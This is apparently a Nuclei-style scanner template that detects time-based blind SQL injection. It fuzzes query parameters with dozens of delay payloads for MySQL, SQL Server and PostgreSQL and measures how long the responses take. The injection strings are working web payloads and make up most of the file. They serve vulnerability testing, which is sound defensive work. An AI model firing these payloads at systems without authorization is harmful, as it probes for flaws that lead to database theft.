time-based-sqli: Time-Based Blind SQL Injection

id: time-based-sqli

info:
  name: Time-Based Blind SQL Injection
  author: 0xKayala,Jaenact
  severity: critical
  description: |
    Sends time-delay SQL payloads and measures response latency to confirm blind injection in various database engines, enabling data extraction without direct error messages.
  tags: time-based-sqli,sqli,dast,blind

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - "duration<=7"
        internal: true

  - raw:
      - |
        @timeout: 20s
        GET / HTTP/1.1
        Host: {{Hostname}}

    payloads:
      injection:
        # MySQL / MariaDB
        - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)"
        - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z"
        - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--"
        - "if(now()=sysdate(),SLEEP(7),0)"
        - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z"
        - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z"
        - "sleep(7)#"
        - "1 or sleep(7)#"
        - "\" or sleep(7)#"
        - "' or sleep(7)#"
        - "\" or sleep(7)=\""
        - "' or sleep(7)='"
        - "1) or sleep(7)#"
        - "\") or sleep(7)=\""
        - "') or sleep(7)='"
        - "1)) or sleep(7)#"
        - "\")) or sleep(7)=\""
        - "')) or sleep(7)='"
        - "AND (SELECT * FROM (SELECT(SLEEP(7)))bAKL) AND 'vRxe'='vRxe"
        - "AND (SELECT * FROM (SELECT(SLEEP(7)))YjoC) AND '%'='"
        - "AND (SELECT * FROM (SELECT(SLEEP(7)))nQIP)"
        - "AND (SELECT * FROM (SELECT(SLEEP(7)))nQIP)--"
        - "AND (SELECT * FROM (SELECT(SLEEP(7)))nQIP)#"
        - "SLEEP(7)#"
        - "SLEEP(7)--"
        - "SLEEP(7)=\""
        - "SLEEP(7)='"
        - "or SLEEP(7)"
        - "or SLEEP(7)#"
        - "or SLEEP(7)--"
        - "or SLEEP(7)=\""
        - "or SLEEP(7)='"
        - "AnD SLEEP(7)"
        - "AnD SLEEP(7)--"
        - "AnD SLEEP(7)#"
        - "&&SLEEP(7)"
        - "&&SLEEP(7)--"
        - "&&SLEEP(7)#"
        - "' AnD SLEEP(7) ANd '1"
        - "'&&SLEEP(7)&&'1"
        - "ORDER BY SLEEP(7)"
        - "ORDER BY SLEEP(7)--"
        - "ORDER BY SLEEP(7)#"
        - "(SELECT * FROM (SELECT(SLEEP(7)))ecMj)"
        - "(SELECT * FROM (SELECT(SLEEP(7)))ecMj)#"
        - "(SELECT * FROM (SELECT(SLEEP(7)))ecMj)--"
        - "+ SLEEP(7) + '"
        - "SLEEP(7)/*' or SLEEP(7) or '\" or SLEEP(7) or \"*/"

        # SQL Server
        - ";waitfor delay '0:0:7'--"
        - ");waitfor delay '0:0:7'--"
        - "';waitfor delay '0:0:7'--"
        - "\";waitfor delay '0:0:7'--"
        - "');waitfor delay '0:0:7'--"
        - "\");waitfor delay '0:0:7'--"
        - "));waitfor delay '0:0:7'--"
        - "'));waitfor delay '0:0:7'--"
        - "\"));waitfor delay '0:0:7'--"
        - "waitfor delay '00:00:07'"
        - "waitfor delay '00:00:07'--"
        - "waitfor delay '00:00:07'#"

        # PostgreSQL
        - "pg_sleep(7)--"
        - "1 or pg_sleep(7)--"
        - "\" or pg_sleep(7)--"
        - "' or pg_sleep(7)--"
        - "1) or pg_sleep(7)--"
        - "\") or pg_sleep(7)--"
        - "') or pg_sleep(7)--"
        - "1)) or pg_sleep(7)--"
        - "\")) or pg_sleep(7)--"
        - "')) or pg_sleep(7)--"
        - "pg_SLEEP(7)"
        - "pg_SLEEP(7)--"
        - "pg_SLEEP(7)#"
        - "or pg_SLEEP(7)"
        - "or pg_SLEEP(7)--"
        - "or pg_SLEEP(7)#"

    fuzzing:
      - part: query
        type: replace
        mode: single
        fuzz:
          - "{{injection}}"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "duration>=7 && duration <=16"
# digest: 490a004630440220309239d5777147313e84be59dd7de76c9ecf2fb9906dfee402c77c9699956df9022046402821c7d21565effb26fd2aab34bf0474ebfb6876b979f1efadebc7af04c4:922c64590222798bb761d5b6d8e72950